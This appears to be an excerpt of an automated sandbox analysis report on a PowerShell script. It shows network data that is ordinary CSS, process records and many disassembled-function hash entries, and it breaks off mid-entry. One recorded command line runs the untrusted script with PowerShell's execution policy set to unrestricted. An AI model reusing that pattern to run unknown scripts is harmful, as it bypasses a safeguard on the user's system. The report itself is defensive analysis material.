                                                2025-02-18 07:26:02 UTC1369INData Raw: 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 61 70 65 72 63 6c 69 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 32 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 68 65 61 72 74 2d 65 6d 70 74 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6c 69 6e 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 68 6f 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 75 73 68 70 69 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 75 73 64 3a 62 65 66
                                                Data Ascii: rd:before{content:"\e141"}.glyphicon-paperclip:before{content:"\e142"}.glyphicon-heart-empty:before{content:"\e143"}.glyphicon-link:before{content:"\e144"}.glyphicon-phone:before{content:"\e145"}.glyphicon-pushpin:before{content:"\e146"}.glyphicon-usd:bef
                                                2025-02-18 07:26:02 UTC1369INData Raw: 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6c 6f 70 70 79 2d 72 65 6d 6f 76 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6c 6f 70 70 79 2d 73 61 76 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6c 6f 70 70 79 2d 6f 70 65 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 72 65 64 69 74 2d 63 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 37 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 72 61 6e 73 66 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 38 22 7d 2e 67 6c 79 70 68 69
                                                Data Ascii: re{content:"\e173"}.glyphicon-floppy-remove:before{content:"\e174"}.glyphicon-floppy-save:before{content:"\e175"}.glyphicon-floppy-open:before{content:"\e176"}.glyphicon-credit-card:before{content:"\e177"}.glyphicon-transfer:before{content:"\e178"}.glyphi


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:02:25:55
                                                Start date:18/02/2025
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Pmw24ExIdx.ps1"
                                                Imagebase:0xf0000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:1
                                                Start time:02:25:55
                                                Start date:18/02/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:02:25:56
                                                Start date:18/02/2025
                                                Path:C:\Windows\System32\notepad.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\Pmw24ExIdx.ps1"
                                                Imagebase:0x7ff711430000
                                                File size:201'216 bytes
                                                MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Disassembly

                                                Reset < >

                                                  Executed Functions

                                                  Function 0A337990 Relevance: 4.4, Strings: 3, Instructions: 696COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1357929440.000000000A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: t84$t84$|34
                                                  • API String ID: 0-2728272504
                                                  • Opcode ID: 7aba188e16378deadeb7d47746b631d1959499a8f9aa9f11aa2a688a683cc541
                                                  • Instruction ID: 4d75d9f32bdff309f919cb388f887a1ba356ae1a6d2e5af683e9799e2dbbb0ba
                                                  • Opcode Fuzzy Hash: 7aba188e16378deadeb7d47746b631d1959499a8f9aa9f11aa2a688a683cc541
                                                  • Instruction Fuzzy Hash: CE523775E05248AFDB15CFA8D484A9DFBB2FF89310F258199E804AB351C735ED86CB90
                                                  Function 0530E4D8 Relevance: .7, Instructions: 711COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5c67a73607960bf7887cb9804dc039c1fd2033606d4d44550bcd4441e36d4d11
                                                  • Instruction ID: c04b00f703a0aafe907a2c89a0255cc839712295995be38a81a923fd243023bd
                                                  • Opcode Fuzzy Hash: 5c67a73607960bf7887cb9804dc039c1fd2033606d4d44550bcd4441e36d4d11
                                                  • Instruction Fuzzy Hash: 5E527E30B043198FDB24DF64C964BADBBBABF88304F1458A9D40AE7294DB709E85DF51
                                                  Function 07B72AC8 Relevance: 5.6, Strings: 4, Instructions: 591COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$4'q$4'q
                                                  • API String ID: 0-4210068417
                                                  • Opcode ID: 8d69685f957a63ba97a0476e8ab955531858d6aa6a2f349cc29641a87d77ecb5
                                                  • Instruction ID: 8c12c0cdb35e15ba0b290302c7bd3e82e3b7acf1b1c95ef738f2f44c1d7247db
                                                  • Opcode Fuzzy Hash: 8d69685f957a63ba97a0476e8ab955531858d6aa6a2f349cc29641a87d77ecb5
                                                  • Instruction Fuzzy Hash: A01227F1B043459FEB259B7888117AABBB2FFC6211F1480FAD915CF291DA31D942C7A1
                                                  Function 07B75910 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q$4'q$4'q
                                                  • API String ID: 0-4210068417
                                                  • Opcode ID: 5778dc18996d988ad5a5321d1cf151afc19728da4bea5c38a10c649a2e9fcdb0
                                                  • Instruction ID: d0e9aee5e190efb27754caddfa49d11a1ad2021b097155c5d23e66d3d920a09c
                                                  • Opcode Fuzzy Hash: 5778dc18996d988ad5a5321d1cf151afc19728da4bea5c38a10c649a2e9fcdb0
                                                  • Instruction Fuzzy Hash: 57513DF1B103168FEB349A2494513BA7BA1EF86611F1484BBD8258F380DF31DD62C7A2
                                                  Function 0A33F8D0 Relevance: 3.9, Strings: 3, Instructions: 195COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1357929440.000000000A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (=$(=$(q
                                                  • API String ID: 0-3002961075
                                                  • Opcode ID: 26d2d558235f80f04351b3322cd1ef9a28eb2aa2b69b27aa1644b08203ea5fb7
                                                  • Instruction ID: 7a39b20985dd802faf2c9d8a79382afcad8691d998bd0dfbeda4bbda29049629
                                                  • Opcode Fuzzy Hash: 26d2d558235f80f04351b3322cd1ef9a28eb2aa2b69b27aa1644b08203ea5fb7
                                                  • Instruction Fuzzy Hash: 53717C75E043498FDB14DFA9C4547AEBBF1AF88210F24846DD50AAB360DB38AD05CF65
                                                  Function 0A33C748 Relevance: 3.2, Strings: 2, Instructions: 669COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1357929440.000000000A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (Xq$LRq
                                                  • API String ID: 0-4183028182
                                                  • Opcode ID: 7334c670cae7fdcff8aca43663e1bb9d3da7f722d78580dce876944e423f3e12
                                                  • Instruction ID: e977d7afe8679e582c28ef0035064d4ce5a21a109aa1072a57597002cd473f80
                                                  • Opcode Fuzzy Hash: 7334c670cae7fdcff8aca43663e1bb9d3da7f722d78580dce876944e423f3e12
                                                  • Instruction Fuzzy Hash: 1B525D34B00218DFEB24DB28C858BADB7B2BF89304F118599D849AB395DB71ED49CF51
                                                  Function 07B75C37 Relevance: 2.5, Strings: 2, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q
                                                  • API String ID: 0-1467158625
                                                  • Opcode ID: 9182780b67cc6a0473ee80468b5f4ddf09584057637224c4253d7a078f3188c5
                                                  • Instruction ID: 571e48ab06e05b1bd315cf27ee069a12ceb991d8d7caf68fc4e831ed6e944570
                                                  • Opcode Fuzzy Hash: 9182780b67cc6a0473ee80468b5f4ddf09584057637224c4253d7a078f3188c5
                                                  • Instruction Fuzzy Hash: 1EF0AFF1A1A3556FE73A463068213E62FA19F4B60071A04F7D861DF6C2CA15DCA2C7B2
                                                  Function 07B75B47 Relevance: 2.5, Strings: 2, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q
                                                  • API String ID: 0-1467158625
                                                  • Opcode ID: 49d291e90122253da63d50d3ba47de330548aa00eae6a8ba7126e0fadbcda670
                                                  • Instruction ID: 6798ff8a9a5be54a5c0d2ff592157fbb607584a62b033283b16e21f0d464e5be
                                                  • Opcode Fuzzy Hash: 49d291e90122253da63d50d3ba47de330548aa00eae6a8ba7126e0fadbcda670
                                                  • Instruction Fuzzy Hash: 53F068F060A3518FE73A1E3169642753FA1DF4B50171940EBE491CF7D2DA298C51C792
                                                  Function 07B75BBF Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q$4'q
                                                  • API String ID: 0-1467158625
                                                  • Opcode ID: de2e5533715db90ad3d84f0a1947fd7e103c6b716cb81db77bae6acb57c4fdc5
                                                  • Instruction ID: f32a0a8fff979be0fae373bf4eae5d7af3662ed4a67a9b6e6caedf47f77a3bcb
                                                  • Opcode Fuzzy Hash: de2e5533715db90ad3d84f0a1947fd7e103c6b716cb81db77bae6acb57c4fdc5
                                                  • Instruction Fuzzy Hash: 4CF062F0B1D3594FE73A1A3428203653AA19F8761171980E79862DF2C5D919CC51C7B3
                                                  Function 0530F13E Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q
                                                  • API String ID: 0-1807707664
                                                  • Opcode ID: ea3f2df72b6c2b5451522a55f9c1470ec2ab50d1e3e968f21ffee31cc11fddc9
                                                  • Instruction ID: 6bfaa9e36567b9726d1faa2a1fb8044a2f55e05eefb7731c86b9d41f61a42002
                                                  • Opcode Fuzzy Hash: ea3f2df72b6c2b5451522a55f9c1470ec2ab50d1e3e968f21ffee31cc11fddc9
                                                  • Instruction Fuzzy Hash: 87F0C8303403102BE718B665AC51B5E3B93ABC4614F54452CE4065F2C5C9A0BC0A47A5
                                                  Function 0530F140 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'q
                                                  • API String ID: 0-1807707664
                                                  • Opcode ID: a74c8895645699ce65bab7e27972656364f7fbb5e8d22ddf9d48119d5c21803b
                                                  • Instruction ID: d6995c012fda6e23631699b5b14ac633aacfd54f9529590edd3b3433fb09445f
                                                  • Opcode Fuzzy Hash: a74c8895645699ce65bab7e27972656364f7fbb5e8d22ddf9d48119d5c21803b
                                                  • Instruction Fuzzy Hash: DFF096303403102BE718B665AC51B5E7797EBC8614F54493CE9055F3C9CE61BC0A47A5
                                                  Function 0A33D848 Relevance: .3, Instructions: 341COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1357929440.000000000A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 71773dc8ad261f2b199f08379b0ef68a6213f2ccdcdd4545da4fbcdcf7221582
                                                  • Instruction ID: 97db4e57b4e1915f9ecf02168f8a1f6f1f61a0330d8e8f9d3704730c97fe884e
                                                  • Opcode Fuzzy Hash: 71773dc8ad261f2b199f08379b0ef68a6213f2ccdcdd4545da4fbcdcf7221582
                                                  • Instruction Fuzzy Hash: 63E12675A04208EFDB15CFA8D484AADFBB2FF88350F258559E805AB355C771ED82CB90
                                                  Function 05302F50 Relevance: .2, Instructions: 214COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 28e057a9f4f65f8b37a546d3c03abc772f8ffd400a49b38dcd1e368fe0311974
                                                  • Instruction ID: e1e79db4ff191227f70b3522a6c0f6f3ff6c44dd7f0460b646f77e6d5f48150c
                                                  • Opcode Fuzzy Hash: 28e057a9f4f65f8b37a546d3c03abc772f8ffd400a49b38dcd1e368fe0311974
                                                  • Instruction Fuzzy Hash: E5919F70A047059FCB15CF58C8A4AAEFBB1FF49310B258559D816EB3A5C736EC51CBA0
                                                  Function 07B70D78 Relevance: .2, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c1b89a99b18a8eccdadeb148d1472a5b9613f27ecd0078c6f42c7f3fa935be84
                                                  • Instruction ID: 42d9b006a0c0b4e8ad9fa4bcf42de07e7d4fc1f160b2075bb5b92fb64c84b995
                                                  • Opcode Fuzzy Hash: c1b89a99b18a8eccdadeb148d1472a5b9613f27ecd0078c6f42c7f3fa935be84
                                                  • Instruction Fuzzy Hash: 406149F17043059FEB216A2588517AABFB2EF82214F1480BBD555CF381DB35C841C7A1
                                                  Function 0530BD50 Relevance: .1, Instructions: 142COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b376c6622775b57f0de04a1431d83abc6c9576ebff362cd2c011cb613a1008fe
                                                  • Instruction ID: 702b972d124de8f2d2c21623d13b316095325da90a70de1c768d7f5716a0cdab
                                                  • Opcode Fuzzy Hash: b376c6622775b57f0de04a1431d83abc6c9576ebff362cd2c011cb613a1008fe
                                                  • Instruction Fuzzy Hash: 68418734B002048FEB15DB78D4557AEBBF3EF8D210F18846AD805EB795CB35AC428BA1
                                                  Function 0A33FB78 Relevance: .1, Instructions: 135COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1357929440.000000000A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 28af348b3e291da0192736f41cb6947bdcad76daac1bfe9c3ab50660ef7da3f5
                                                  • Instruction ID: 67100bdbef67286cffbac3b706159ed3004abe2f2496c519ff8dea0c8f9f7bbc
                                                  • Opcode Fuzzy Hash: 28af348b3e291da0192736f41cb6947bdcad76daac1bfe9c3ab50660ef7da3f5
                                                  • Instruction Fuzzy Hash: B8514272D04249DFDB24CF99C488BDEFBF5AF48314F24805AD808AB260DB74A846CF90
                                                  Function 0530F68C Relevance: .1, Instructions: 121COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a1395b470634c510a3665f7b733c1ed478ba6a2c526303096cae8dc8b9516d0d
                                                  • Instruction ID: 536843df6eb2942cf2eba9f3365e89a8085df7abe8f1ee53335f3c196a3360e0
                                                  • Opcode Fuzzy Hash: a1395b470634c510a3665f7b733c1ed478ba6a2c526303096cae8dc8b9516d0d
                                                  • Instruction Fuzzy Hash: 53512B34A003098FDB14DF68C454AEE7BB2FF88351F149168D805AB3A5DB71ED86CBA1
                                                  Function 0530BD80 Relevance: .1, Instructions: 119COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f7976fb41bfac9bd6d36dc10afc423baf1e800ef28999b7d78cb534d5c6b44e0
                                                  • Instruction ID: 0f9729d61918b0ba3b8c71f0123a06cd709f153ee3eb4a9da0eeef902796389b
                                                  • Opcode Fuzzy Hash: f7976fb41bfac9bd6d36dc10afc423baf1e800ef28999b7d78cb534d5c6b44e0
                                                  • Instruction Fuzzy Hash: 8D41F130B002049FEB14DB75C4657AEBAF7EFCC210F18C469D806AB795DB75AC429B61
                                                  Function 07B72AAF Relevance: .1, Instructions: 116COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8ad760d48ead858d04343066a82ff3e38d75835fdd208f2dd0410e519f3293a7
                                                  • Instruction ID: e313a64e3e9b02527f3ccb31b7456f2cb2a60932175b00a51a3686465f7df0d6
                                                  • Opcode Fuzzy Hash: 8ad760d48ead858d04343066a82ff3e38d75835fdd208f2dd0410e519f3293a7
                                                  • Instruction Fuzzy Hash: 1441E1F0B002028FEB298F3485527FA7BB2FF95604F1984E9E9159B391D732D951C7A1
                                                  Function 05303060 Relevance: .1, Instructions: 106COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1346541428.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5300000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8589a7460813fc5fc42f7f645a37643e22bb873db82731506e3bf9d2c1937ecc
                                                  • Instruction ID: bac17865db49dfae0e65dc53364b9fc836b5958c21c399c9c390fa0dd44459d8
                                                  • Opcode Fuzzy Hash: 8589a7460813fc5fc42f7f645a37643e22bb873db82731506e3bf9d2c1937ecc
                                                  • Instruction Fuzzy Hash: A6413774A00605AFCB19CF58C4A4EAAF7B1FF48310B158569D816AB3A4C736FC91CBA4
                                                  Function 0A33E1D0 Relevance: .1, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1357929440.000000000A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d953ac761d979cefe01a02f97873a7abf6ed4d4c4ea56888980f9911fe6e397
                                                  • Instruction ID: 71f361a8f94860e574b413e7e109e88a616925fac6dd4d5a116ba1cf336cdbf6
                                                  • Opcode Fuzzy Hash: 4d953ac761d979cefe01a02f97873a7abf6ed4d4c4ea56888980f9911fe6e397
                                                  • Instruction Fuzzy Hash: 2741E276D012489FDB18DFEAE944BDEBBF6AF48310F24802AE415B7250DB74A945CF50
                                                  Function 0A3370B0 Relevance: .1, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1357929440.000000000A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7ba728fbcf0ab1d0dfdc21d08635d6af54d641ecfd2aa7fec82d66fd240e2051
                                                  • Instruction ID: 53ac37723511dc6209d1567ec8cd991e0ed0deef8df2d6e1bf72be7b1879f95e
                                                  • Opcode Fuzzy Hash: 7ba728fbcf0ab1d0dfdc21d08635d6af54d641ecfd2aa7fec82d66fd240e2051
                                                  • Instruction Fuzzy Hash: 174105B2D002489FDB18CFAAD944ADEFBF5AF48310F10802AE515B7254EB34A945CF50
                                                  Function 0A33704C Relevance: .1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1357929440.000000000A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3729dc0c76ec7f9ab435f7314d4c3126b0113c4734bdf6b8af4c2f687e56bab3
                                                  • Instruction ID: dc798a85ffdc7b4b1294d6b2eac5eab2124c8791ae97adcd0e8f03377b3f65d6
                                                  • Opcode Fuzzy Hash: 3729dc0c76ec7f9ab435f7314d4c3126b0113c4734bdf6b8af4c2f687e56bab3
                                                  • Instruction Fuzzy Hash: 443143B2D053899FDB28CFA9C8547DEBFF1AF48300F10842AD415AB250EB385946CF50
                                                  Function 07B70D5B Relevance: .1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1352343800.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7b70000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1b7815410ef4fdfff49d03c5f7c756cf4af1766d1376ee5c4107983bb59fe765
                                                  • Instruction ID: be879f17fa028ae62111bffaba64ce5e181baa712568f09337132bac76c8c368
                                                  • Opcode Fuzzy Hash: 1b7815410ef4fdfff49d03c5f7c756cf4af1766d1376ee5c4107983bb59fe765
                                                  • Instruction Fuzzy Hash: 212127F1B04305AFEB115B2498217BA7FA29F42604F0980EBD810CB7C2E735D941D7A1
                                                  Function 0A3370A5 Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1357929440.000000000A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 251e577a4c3e865bca04217d9efed57faa06fbb291eab4d05aaf3724c7b41ce1
                                                  • Instruction ID: d55505c395f0639455f56a40661c4203e64c43a3282ba0a8bdbd75c410772c1f
                                                  • Opcode Fuzzy Hash: 251e577a4c3e865bca04217d9efed57faa06fbb291eab4d05aaf3724c7b41ce1
                                                  • Instruction Fuzzy Hash: D23101B2D002489FDB28CFAAC955BDEBFF6AF48300F14802ED415AB250EB359946CF50
                                                  Function 0A33E0C0 Relevance: .1, Instructions: 77COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1357929440.000000000A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a330000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 969d3dcccea97f916ffffac540ea07583941fa5c1ecccd287f37961923632354
                                                  • Instruction ID: d29fea06398baf33fb3c580799cbf712156659e4304344c5c04f1d79b8999041
                                                  • Opcode Fuzzy Hash: 969d3dcccea97f916ffffac540ea07583941fa5c1ecccd287f37961923632354
                                                  • Instruction Fuzzy Hash: 293103B6D152589FDB14CFA9D884BDEBBF5AF48310F24802AE515B7240CB78A845CB50
                                                  Function 04D9EEA8 Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
